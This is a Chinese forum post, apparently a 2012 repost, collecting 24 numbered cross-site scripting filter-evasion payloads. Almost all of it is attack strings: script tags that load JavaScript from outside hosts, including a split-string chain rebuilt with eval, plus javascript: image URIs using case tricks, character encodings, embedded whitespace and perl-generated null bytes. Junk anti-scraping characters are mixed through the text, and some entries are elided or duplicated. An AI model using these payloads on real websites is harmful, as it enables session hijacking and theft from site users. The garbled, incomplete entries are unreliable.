标题: xss跨站脚本攻击汇总 [打印本页] 作者: admin 时间: 2012-9-5 14:56 标题: xss跨站脚本攻击汇总 貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。 . { ^2 p5 H& {2 N5 r |) E6 u9 } 6 Y9 d' ]" U! L, Q (1)普通的XSS JavaScript注入8 O8 w. _5 o' Q& \- f2 L
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> ' @8 C* q+ D+ t( K+ D- h6 j3 }# \, @6 r9 a U k
(2)IMG标签XSS使用JavaScript命令 # o* U1 u& B- ]- Y/ y' m <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> & g# ~ W# C1 Y9 E# k4 S' I9 ]& d/ i4 P+ r
(3)IMG标签无分号无引号/ a: x+ D+ B2 R | v
<IMG SRC=javascript:alert(‘XSS’)> 7 p5 y# H! ~9 _+ Q& P# {! P( Q/ T5 \ u
(4)IMG标签大小写不敏感 6 j# y6 M3 |: m2 `" o+ F: ~ |; r <IMG SRC=JaVaScRiPt:alert(‘XSS’)>* F5 i7 @# u$ A: u5 }) m% r2 x2 m
: }/ v* w+ P2 H, }
(5)HTML编码(必须有分号) 4 U, g! t; y+ R: y <IMG SRC=javascript:alert(“XSS”)> 0 c& P/ o) y# ~- I- ~- K% l! S, H$ a7 o7 S! e6 y- y6 }) m
(6)修正缺陷IMG标签 , u* d) K0 X- |, U! a) } <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 A, \/ d2 E2 Z& m4 I2 v1 i
, m+ e0 ~( r; H2 E* ~2 R% C (7)formCharCode标签(计算器) + N. Z0 q9 M d4 Q <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 G, M6 z+ G, _2 t5 B
! \% I8 c6 V8 ~& ]2 }" }
(8)UTF-8的Unicode编码(计算器)5 i \& ^* o- G3 t' J3 G- _! a
<IMG SRC=jav..省略..S')>( `* d) X( l- J! j
2 i: r, I$ k1 g- `( k5 a( G
(9)7位的UTF-8的Unicode编码是没有分号的(计算器) ' e8 S( O7 I8 E; H; M <IMG SRC=jav..省略..S')>. k" F/ a4 O1 a
: B& y4 {3 c$ R# I (10)十六进制编码也是没有分号(计算器)6 p. v( G: p; L" ~" c) d
<IMG SRC=java..省略..XSS')>1 H+ b! e3 ^" X5 }* \! O/ A8 f
" r! V3 u! H8 U% s% C
(11)嵌入式标签,将Javascript分开 1 _% f8 o8 z1 K4 @# q4 E* {/ D <IMG SRC=”jav ascript:alert(‘XSS’);”>; p8 s5 t7 G- q2 P( p3 {' S
9 I$ s8 E5 f: ~/ y5 Z: B
(12)嵌入式编码标签,将Javascript分开+ G0 g! ]7 u# e! P$ F
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ V' _: w0 h0 j. r- H* k
! ^) M) s/ a& N) X
(13)嵌入式换行符7 G; [! ]' t3 Y. J! b
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 y* @: l. R0 }' @: @) u1 T
1 S3 m& F; u, o& w (14)嵌入式回车- G( ], ^% ?: B e: C; h) R$ J
<IMG SRC=”jav ascript:alert(‘XSS’);”> 0 m# g( z* E! P- K; T( r( d' y9 s + `' f- b+ h# o5 e. { (15)嵌入式多行注入JavaScript,这是XSS极端的例子 ' H4 Z6 R# G4 X% N <IMG SRC=”javascript:alert(‘XSS‘)”> R, x0 ^' ]0 _
1 b$ a. R) D8 ~7 x9 h; ?. M
(16)解决限制字符(要求同页面) 2 q% I* v3 ` A% H/ k <script>z=’document.’</script>6 X$ o# n) ] E
<script>z=z+’write(“‘</script>9 |. x7 K5 {& \$ O5 g, E+ B5 X0 J
<script>z=z+’<script’</script>* {* c6 l9 ]: |1 Q5 s4 L& Y9 i
<script>z=z+’ src=ht’</script># `0 i# ], ?# u
<script>z=z+’tp://ww’</script> 6 x& {* l2 }: n1 b; l0 y* q* Q; o <script>z=z+’w.shell’</script> 9 D$ a' ?/ A: l0 k4 j" J- z( p! H <script>z=z+’.net/1.’</script> H3 v3 w' D( }5 s# A6 @3 B) Q& u
<script>z=z+’js></sc’</script>. |! g/ v+ A7 d3 ?" ~: R
<script>z=z+’ript>”)’</script>, ~0 ~1 u2 \' l' W- {/ B
<script>eval_r(z)</script>& p x- v! a0 w& b
/ C) Y( l( j; q& u: r (17)空字符 ! N+ U! V7 |# y j/ ~0 I& M perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& |+ s C1 |3 c8 Z; E- X5 D. \
9 N% P6 D# A% y" \( m& D, N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; N O( g3 ~5 X7 J+ n5 @
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out , G. j% i2 M: o6 M% m2 b' ?4 P6 q6 z& c5 i
(19)Spaces和meta前的IMG标签 5 @( l5 W$ x& O" S7 `" D <IMG SRC=” javascript:alert(‘XSS’);”>" e3 v+ b8 A# `
0 L2 x4 g; Y+ Y2 D5 ?
(20)Non-alpha-non-digit XSS 0 r! E' F" A( S. W: p- a <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> # G z7 ~) I+ Z; r0 ] 4 X8 N3 g# ?6 F [3 k% g G1 G (21)Non-alpha-non-digit XSS to 2 1 d8 i# }4 }8 `, d: F <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 B6 t* z( l+ Z; Y3 ]
7 a( d* }; a# o0 ^0 t (22)Non-alpha-non-digit XSS to 3 7 P* S8 c3 o4 H2 s3 N <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ C) ]/ t" X. t2 b) \) L: D
x) M$ X6 I+ L# ~7 V (23)双开括号 `( z/ J; l" D4 J" B$ Z
<<SCRIPT>alert(“XSS”);//<</SCRIPT> : V% @- X/ U f 7 v- _, i: F8 ^7 v5 q- I; N8 k$ n (24)无结束脚本标记(仅火狐等浏览器) * o% C: B! ~ J: u6 Y) [ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 _/ b# ]% s# F8 z1 E( H8 Z